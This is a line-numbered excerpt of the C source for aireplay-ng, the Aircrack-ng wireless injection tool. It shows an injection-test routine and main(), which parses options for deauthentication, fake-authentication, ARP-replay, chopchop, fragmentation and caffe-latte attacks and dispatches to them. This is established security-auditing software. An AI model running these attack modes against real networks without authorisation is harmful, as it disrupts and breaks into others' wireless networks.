if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
5642
if( (packet[1] & 0x04) && memcmp( h80211+22, packet+22, 2 ) == 0 )
5651
gettimeofday( &tv2, NULL );
5652
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3*atime*1000)) //wait 3*'atime' ms for an answer
5662
if(i==0) //attack -0
5664
PCT; printf("Attack -0: OK\n");
5666
else if(i==1) //attack -1 (open)
5668
PCT; printf("Attack -1 (open): OK\n");
5670
else if(i==2) //attack -1 (psk)
5672
PCT; printf("Attack -1 (psk): OK\n");
5674
else if(i==3) //attack -3
5676
PCT; printf("Attack -2/-3/-4/-6: OK\n");
5678
else if(i==4) //attack -5
5680
PCT; printf("Attack -5/-7: OK\n");
5685
if(i==0) //attack -0
5687
PCT; printf("Attack -0: Failed\n");
5689
else if(i==1) //attack -1 (open)
5691
PCT; printf("Attack -1 (open): Failed\n");
5693
else if(i==2) //attack -1 (psk)
5695
PCT; printf("Attack -1 (psk): Failed\n");
5697
else if(i==3) //attack -3
5699
PCT; printf("Attack -2/-3/-4/-6: Failed\n");
5701
else if(i==4) //attack -5
5703
PCT; printf("Attack -5/-7: Failed\n");
5708
if(!gotit && answers)
5710
PCT; printf("Injection is working!\n");
5711
if(opt.fast) return 0;
5718
int main( int argc, char *argv[] )
5722
/* check the arguments */
5724
memset( &opt, 0, sizeof( opt ) );
5725
memset( &dev, 0, sizeof( dev ) );
5727
opt.f_type = -1; opt.f_subtype = -1;
5728
opt.f_minlen = -1; opt.f_maxlen = -1;
5729
opt.f_tods = -1; opt.f_fromds = -1;
5730
opt.f_iswep = -1; opt.ringbuffer = 8;
5732
opt.a_mode = -1; opt.r_fctrl = -1;
5734
opt.delay = 15; opt.bittest = 0;
5735
opt.fast = 0; opt.r_smac_set = 0;
5736
opt.npackets = 1; opt.nodetect = 0;
5737
opt.rtc = 1; opt.f_retry = 0;
5741
#if defined(__FreeBSD__)
5743
check what is our FreeBSD version. injection works
5744
only on 7-CURRENT so abort if it's a lower version.
5746
if( __FreeBSD_version < 700000 )
5748
fprintf( stderr, "Aireplay-ng does not work on this "
5749
"release of FreeBSD.\n" );
5757
int option_index = 0;
5759
static struct option long_options[] = {
5760
{"deauth", 1, 0, '0'},
5761
{"fakeauth", 1, 0, '1'},
5762
{"interactive", 0, 0, '2'},
5763
{"arpreplay", 0, 0, '3'},
5764
{"chopchop", 0, 0, '4'},
5765
{"fragment", 0, 0, '5'},
5766
{"caffe-latte", 0, 0, '6'},
5767
{"cfrag", 0, 0, '7'},
5768
{"test", 0, 0, '9'},
5769
{"help", 0, 0, 'H'},
5770
{"fast", 0, 0, 'F'},
5771
{"bittest", 0, 0, 'B'},
5775
int option = getopt_long( argc, argv,
5776
"b:d:s:m:n:u:v:t:T:f:g:w:x:p:a:c:h:e:ji:r:k:l:y:o:q:0:1:2345679HFBDR",
5777
long_options, &option_index );
5779
if( option < 0 ) break;
5789
printf("\"%s --help\" for help.\n", argv[0]);
5794
printf("\"%s --help\" for help.\n", argv[0]);
5799
if( getmac( optarg, 1 ,opt.f_bssid ) != 0 )
5801
printf( "Invalid BSSID (AP MAC address).\n" );
5802
printf("\"%s --help\" for help.\n", argv[0]);
5809
if( getmac( optarg, 1, opt.f_dmac ) != 0 )
5811
printf( "Invalid destination MAC address.\n" );
5812
printf("\"%s --help\" for help.\n", argv[0]);
5819
if( getmac( optarg, 1, opt.f_smac ) != 0 )
5821
printf( "Invalid source MAC address.\n" );
5822
printf("\"%s --help\" for help.\n", argv[0]);
5829
ret = sscanf( optarg, "%d", &opt.f_minlen );
5830
if( opt.f_minlen < 0 || ret != 1 )
5832
printf( "Invalid minimum length filter. [>=0]\n" );
5833
printf("\"%s --help\" for help.\n", argv[0]);
5840
ret = sscanf( optarg, "%d", &opt.f_maxlen );
5841
if( opt.f_maxlen < 0 || ret != 1 )
5843
printf( "Invalid maximum length filter. [>=0]\n" );
5844
printf("\"%s --help\" for help.\n", argv[0]);
5851
ret = sscanf( optarg, "%d", &opt.f_type );
5852
if( opt.f_type < 0 || opt.f_type > 3 || ret != 1 )
5854
printf( "Invalid type filter. [0-3]\n" );
5855
printf("\"%s --help\" for help.\n", argv[0]);
5862
ret = sscanf( optarg, "%d", &opt.f_subtype );
5863
if( opt.f_subtype < 0 || opt.f_subtype > 15 || ret != 1 )
5865
printf( "Invalid subtype filter. [0-15]\n" );
5866
printf("\"%s --help\" for help.\n", argv[0]);
5872
ret = sscanf(optarg, "%d", &opt.f_retry);
5873
if ((opt.f_retry < 1) || (opt.f_retry > 65535) || (ret != 1)) {
5874
printf("Invalid retry setting. [1-65535]\n");
5875
printf("\"%s --help\" for help.\n", argv[0]);
5882
ret = sscanf( optarg, "%d", &opt.f_tods );
5883
if(( opt.f_tods != 0 && opt.f_tods != 1 ) || ret != 1 )
5885
printf( "Invalid tods filter. [0,1]\n" );
5886
printf("\"%s --help\" for help.\n", argv[0]);
5893
ret = sscanf( optarg, "%d", &opt.f_fromds );
5894
if(( opt.f_fromds != 0 && opt.f_fromds != 1 ) || ret != 1 )
5896
printf( "Invalid fromds filter. [0,1]\n" );
5897
printf("\"%s --help\" for help.\n", argv[0]);
5904
ret = sscanf( optarg, "%d", &opt.f_iswep );
5905
if(( opt.f_iswep != 0 && opt.f_iswep != 1 ) || ret != 1 )
5907
printf( "Invalid wep filter. [0,1]\n" );
5908
printf("\"%s --help\" for help.\n", argv[0]);
5915
ret = sscanf( optarg, "%d", &opt.r_nbpps );
5916
if( opt.r_nbpps < 1 || opt.r_nbpps > 1024 || ret != 1 )
5918
printf( "Invalid number of packets per second. [1-1024]\n" );
5919
printf("\"%s --help\" for help.\n", argv[0]);
5926
ret = sscanf( optarg, "%d", &opt.npackets );
5927
if( opt.npackets < 0 || opt.npackets > 512 || ret != 1 )
5929
printf( "Invalid number of packets per burst. [0-512]\n" );
5930
printf("\"%s --help\" for help.\n", argv[0]);
5937
ret = sscanf( optarg, "%d", &opt.delay );
5938
if( opt.delay < 1 || opt.delay > 600 || ret != 1 )
5940
printf( "Invalid number of seconds. [1-600]\n" );
5941
printf("\"%s --help\" for help.\n", argv[0]);
5948
ret = sscanf( optarg, "%x", &opt.r_fctrl );
5949
if( opt.r_fctrl < 0 || opt.r_fctrl > 65535 || ret != 1 )
5951
printf( "Invalid frame control word. [0-65535]\n" );
5952
printf("\"%s --help\" for help.\n", argv[0]);
5959
if( getmac( optarg, 1, opt.r_bssid ) != 0 )
5961
printf( "Invalid AP MAC address.\n" );
5962
printf("\"%s --help\" for help.\n", argv[0]);
5969
if( getmac( optarg, 1, opt.r_dmac ) != 0 )
5971
printf( "Invalid destination MAC address.\n" );
5972
printf("\"%s --help\" for help.\n", argv[0]);
5979
ret = sscanf( optarg, "%d", &opt.ringbuffer );
5980
if( opt.ringbuffer < 1 || ret != 1 )
5982
printf( "Invalid replay ring buffer size. [>=1]\n");
5983
printf("\"%s --help\" for help.\n", argv[0]);
5990
if( getmac( optarg, 1, opt.r_smac ) != 0 )
5992
printf( "Invalid source MAC address.\n" );
5993
printf("\"%s --help\" for help.\n", argv[0]);
6001
memset( opt.r_essid, 0, sizeof( opt.r_essid ) );
6002
strncpy( opt.r_essid, optarg, sizeof( opt.r_essid ) - 1 );
6007
opt.r_fromdsinj = 1;
6017
inet_aton( optarg, (struct in_addr *) opt.r_dip );
6022
inet_aton( optarg, (struct in_addr *) opt.r_sip );
6027
if( opt.prga != NULL )
6029
printf( "PRGA file already specified.\n" );
6030
printf("\"%s --help\" for help.\n", argv[0]);
6033
if( read_prga(&(opt.prga), optarg) != 0 )
6041
if( opt.s_face != NULL || opt.s_file )
6043
printf( "Packet source already specified.\n" );
6044
printf("\"%s --help\" for help.\n", argv[0]);
6047
opt.s_face = optarg;
6048
opt.port_in = get_ip_port(opt.s_face, opt.ip_in, sizeof(opt.ip_in)-1);
6053
if( opt.s_face != NULL || opt.s_file )
6055
printf( "Packet source already specified.\n" );
6056
printf("\"%s --help\" for help.\n", argv[0]);
6059
opt.s_file = optarg;
6070
if( opt.a_mode != -1 )
6072
printf( "Attack mode already specified.\n" );
6073
printf("\"%s --help\" for help.\n", argv[0]);
6078
for (i=0; optarg[i] != 0; i++)
6080
if (isdigit((int)optarg[i]) == 0)
6084
ret = sscanf( optarg, "%d", &opt.a_count );
6085
if( opt.a_count < 0 || optarg[i] != 0 || ret != 1)
6087
printf( "Invalid deauthentication count or missing value. [>=0]\n" );
6088
printf("\"%s --help\" for help.\n", argv[0]);
6095
if( opt.a_mode != -1 )
6097
printf( "Attack mode already specified.\n" );
6098
printf("\"%s --help\" for help.\n", argv[0]);
6103
for (i=0; optarg[i] != 0; i++)
6105
if (isdigit((int)optarg[i]) == 0)
6109
ret = sscanf( optarg, "%d", &opt.a_delay );
6110
if( opt.a_delay < 0 || optarg[i] != 0 || ret != 1)
6112
printf( "Invalid reauthentication delay or missing value. [>=0]\n" );
6113
printf("\"%s --help\" for help.\n", argv[0]);
6120
if( opt.a_mode != -1 )
6122
printf( "Attack mode already specified.\n" );
6123
printf("\"%s --help\" for help.\n", argv[0]);
6131
if( opt.a_mode != -1 )
6133
printf( "Attack mode already specified.\n" );
6134
printf("\"%s --help\" for help.\n", argv[0]);
6142
if( opt.a_mode != -1 )
6144
printf( "Attack mode already specified.\n" );
6145
printf("\"%s --help\" for help.\n", argv[0]);
6153
if( opt.a_mode != -1 )
6155
printf( "Attack mode already specified.\n" );
6156
printf("\"%s --help\" for help.\n", argv[0]);
6164
if( opt.a_mode != -1 )
6166
printf( "Attack mode already specified.\n" );
6167
printf("\"%s --help\" for help.\n", argv[0]);
6175
if( opt.a_mode != -1 )
6177
printf( "Attack mode already specified.\n" );
6178
printf("\"%s --help\" for help.\n", argv[0]);
6186
if( opt.a_mode != -1 )
6188
printf( "Attack mode already specified.\n" );
6189
printf("\"%s --help\" for help.\n", argv[0]);
6207
printf( usage, getVersion("Aireplay-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC) );
6215
default : goto usage;
6219
if( argc - optind != 1 )
6224
printf( usage, getVersion("Aireplay-ng", _MAJ, _MIN, _SUB_MIN, _REVISION, _BETA, _RC) );
6226
if( argc - optind == 0)
6228
printf("No replay interface specified.\n");
6232
printf("\"%s --help\" for help.\n", argv[0]);
6237
if( opt.a_mode == -1 )
6239
printf( "Please specify an attack mode.\n" );
6240
printf("\"%s --help\" for help.\n", argv[0]);
6244
if( (opt.f_minlen > 0 && opt.f_maxlen > 0) && opt.f_minlen > opt.f_maxlen )
6246
printf( "Invalid length filter (min(-m):%d > max(-n):%d).\n",
6247
opt.f_minlen, opt.f_maxlen );
6248
printf("\"%s --help\" for help.\n", argv[0]);
6252
if ( opt.f_tods == 1 && opt.f_fromds == 1 )
6254
printf( "FromDS and ToDS bit are set: packet has to come from the AP and go to the AP\n" );
6259
/* open the RTC device if necessary */
6261
#if defined(__i386__)
6263
if( opt.a_mode > 1 )
6265
if( ( dev.fd_rtc = open( "/dev/rtc0", O_RDONLY ) ) < 0 )
6270
if( (dev.fd_rtc == 0) && ( ( dev.fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 ) )
6280
if( ioctl( dev.fd_rtc, RTC_IRQP_SET, RTC_RESOLUTION ) < 0 )
6282
perror( "ioctl(RTC_IRQP_SET) failed" );
6284
"Make sure enhanced rtc device support is enabled in the kernel (module\n"
6285
"rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.\n" );
6286
close( dev.fd_rtc );
6291
if( ioctl( dev.fd_rtc, RTC_PIE_ON, 0 ) < 0 )
6293
perror( "ioctl(RTC_PIE_ON) failed" );
6294
close( dev.fd_rtc );
6301
printf( "For information, no action required:"
6302
" Using gettimeofday() instead of /dev/rtc\n" );
6310
opt.iface_out = argv[optind];
6311
opt.port_out = get_ip_port(opt.iface_out, opt.ip_out, sizeof(opt.ip_out)-1);
6313
//don't open interface(s) when using test mode and airserv
6314
if( ! (opt.a_mode == 9 && opt.port_out >= 0 ) )
6316
/* open the replay interface */
6317
_wi_out = wi_open(opt.iface_out);
6320
dev.fd_out = wi_fd(_wi_out);
6322
/* open the packet source */
6323
if( opt.s_face != NULL )
6325
//don't open interface(s) when using test mode and airserv
6326
if( ! (opt.a_mode == 9 && opt.port_in >= 0 ) )
6328
_wi_in = wi_open(opt.s_face);
6331
dev.fd_in = wi_fd(_wi_in);
6332
wi_get_mac(_wi_in, dev.mac_in);
6338
dev.fd_in = dev.fd_out;
6341
dev.arptype_in = dev.arptype_out;
6342
wi_get_mac(_wi_in, dev.mac_in);
6345
wi_get_mac(_wi_out, dev.mac_out);
6348
/* drop privileges */
6352
if( opt.r_nbpps == 0 )
6354
if( dev.is_wlanng || dev.is_hostap )
6361
if( opt.s_file != NULL )
6363
if( ! ( dev.f_cap_in = fopen( opt.s_file, "rb" ) ) )
6365
perror( "open failed" );
6369
n = sizeof( struct pcap_file_header );
6371
if( fread( &dev.pfh_in, 1, n, dev.f_cap_in ) != (size_t) n )
6373
perror( "fread(pcap file header) failed" );
6377
if( dev.pfh_in.magic != TCPDUMP_MAGIC &&
6378
dev.pfh_in.magic != TCPDUMP_CIGAM )
6380
fprintf( stderr, "\"%s\" isn't a pcap file (expected "
6381
"TCPDUMP_MAGIC).\n", opt.s_file );
6385
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
6386
SWAP32(dev.pfh_in.linktype);
6388
if( dev.pfh_in.linktype != LINKTYPE_IEEE802_11 &&
6389
dev.pfh_in.linktype != LINKTYPE_PRISM_HEADER &&
6390
dev.pfh_in.linktype != LINKTYPE_RADIOTAP_HDR &&
6391
dev.pfh_in.linktype != LINKTYPE_PPI_HDR )
6393
fprintf( stderr, "Wrong linktype from pcap file header "
6394
"(expected LINKTYPE_IEEE802_11) -\n"
6395
"this doesn't look like a regular 802.11 "
6401
//if there is no -h given, use default hardware mac
6402
if( maccmp( opt.r_smac, NULL_MAC) == 0 )
6404
memcpy( opt.r_smac, dev.mac_out, 6);
6405
if(opt.a_mode != 0 && opt.a_mode != 4 && opt.a_mode != 9)
6407
printf("No source MAC (-h) specified. Using the device MAC (%02X:%02X:%02X:%02X:%02X:%02X)\n",
6408
dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5]);
6412
if( maccmp( opt.r_smac, dev.mac_out) != 0 && maccmp( opt.r_smac, NULL_MAC) != 0)
6414
// if( dev.is_madwifi && opt.a_mode == 5 ) printf("For --fragment to work on madwifi[-ng], set the interface MAC according to (-h)!\n");
6415
fprintf( stderr, "The interface MAC (%02X:%02X:%02X:%02X:%02X:%02X)"
6416
" doesn't match the specified MAC (-h).\n"
6417
"\tifconfig %s hw ether %02X:%02X:%02X:%02X:%02X:%02X\n",
6418
dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5],
6419
opt.iface_out, opt.r_smac[0], opt.r_smac[1], opt.r_smac[2], opt.r_smac[3], opt.r_smac[4], opt.r_smac[5] );
6422
switch( opt.a_mode )
6424
case 0 : return( do_attack_deauth() );
6425
case 1 : return( do_attack_fake_auth() );
6426
case 2 : return( do_attack_interactive() );
6427
case 3 : return( do_attack_arp_resend() );
6428
case 4 : return( do_attack_chopchop() );
6429
case 5 : return( do_attack_fragment() );
6430
case 6 : return( do_attack_caffe_latte() );
6431
case 7 : return( do_attack_cfrag() );
6432
case 9 : return( do_attack_test() );
6436
/* that's all, folks */